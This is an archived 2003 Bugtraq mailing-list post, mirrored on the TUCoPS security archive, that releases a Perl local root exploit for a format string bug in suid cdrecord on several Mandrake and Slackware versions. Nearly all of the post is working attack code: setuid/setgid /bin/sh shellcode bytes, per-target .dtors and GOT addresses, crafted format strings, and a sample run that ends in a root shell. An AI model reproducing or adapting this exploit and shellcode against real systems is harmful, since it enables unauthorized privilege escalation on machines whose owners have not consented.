Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps A-M :: bt1437.txt

Cdrecord local root exploit.






----- Original Message -----
From: "yjm01" <yjm01@terra.com.br>
To: "bugtraq" <bugtraq@securityfocus.com>
Sent: Tuesday, May 13, 2003 12:52 PM
Subject: Cdrecord local root exploit.


Priv8security.com

Hi, here it is local root exploit cdrecord format string bug
 Cdrecord come suid root by default on mandrake distro and it can be
executed by anybody.

[wsxz@localhost wsxz]$ ls -l /usr/bin/cdrecord
-rwsr-sr-x    1 root     cdwriter   278156 Jan  6 07:2 /usr/bin/cdrecord*

here goes the code or get it on
http://releases.priv8security.org/priv8cdr.pl

priv8cdr.pl
--------cut here------------------------------------------------------

#!/usr/bin/perl
###########################################################
#Priv8security.com Cdrecord version 2.0 and < local root exploit.
#
#     Version 1.10 is NOT VULN!!!!
#
#   [wsxz@localhost buffer]$ perl priv8cdr.pl 4
#   Using target number 4
#   Using Mr .dtors 0x808c82c
#   Cdrecord 2.0 (i586-mandrake-linux-gnu) Copyright (C) 1995-2002
Jrg Schilling
#   scsidev: '11۰1ذ.^1FF
#                               
#                                V
#
1@/bin/sh%.134802669x%x%x%x%x%x%x%x%x%n:'
#   devname: '11۰1ذ.^1FF
#                               
#                                V
#
1@/bin/sh%.134802669x%x%x%x%x%x%x%x%x%n'
#   scsibus: -1 target: -1 lun: -1
#   Warning: Open by 'devname' is unintentional and not supported.
#   /usr/bin/cdrecord: No such file or directory. Cannot open '.
Cannot open SCSI driver.
#   /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'.
Make sure you are root.
#   /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord
dev=help'.
#   sh-2.05b# id
#   uid=0(root) gid=0(root) groups=503(wsxz)
#   sh-2.05b#
#####################################################

                    $shellcode =
                    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
                    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
                    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
                    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
                    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
                    "\xff\xff/bin/sh";

                    $cdrecordpath = "/usr/bin/cdrecord";
                    $nop = "\x90"; # x86 NOP
                    $offset = 0; # Default offset to try.


     if (@ARGV == 1 || @ARGV == 2) {
                    $target = $ARGV[0];
                    $offset = $ARGV[1];
                    }else{
                    printf(" Priv8security.com Cdrecord local root
exploit!!\n");
                    printf(" usage: $0 target\n");
                    printf(" List of targets:\n");
                    printf("      1 - Linux Mandrake 8.2 Cdrecord
1.11a15\n");
                    printf("      2 - Linux Mandrake 9.0 Cdrecord
1.11a32\n");
                    printf("      3 - Linux Slackware 8.1 Cdrecord
1.11a24 not suid by default!!!\n");
                    printf("      4 - Linux Mandrake 9.1 Cdrecord 2.0\n");
                    exit(1);
                    }

     if ( $target eq "1" ) {
                   $retword = 0x0807af38; #Mr  .dtors ;)
                   $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:";
                    }
     if ( $target eq "2" ) {
                  # $retword = 0x08084578; #.dtors
                   $retword = 0x08084684; #.GOT exit
                   $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:";
                    }
      if ( $target eq "3" ) {
                   $retword = 0x0807f658;
                   $fmtstring =  "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:";
                    }
       if ( $target eq "4" ) {
                   $retword = 0x0808c82c; #.GOT exit
                   $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:";
                    }

                    printf("Using target number %d\n", $target);
                    printf("Using Mr .dtors 0x%x\n",$retword);

                    $new_retword = pack('l', ($retword));
                    $new_retshell = pack('l', ($retshell));
                    $buffer2 = $new_retword;
                    $buffer2 .= $nop x 150;
                    $buffer2 .= $shellcode;
                    $buffer2 .= $fmtstring;

                    exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");

--------cut here-----------------------------------------------


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH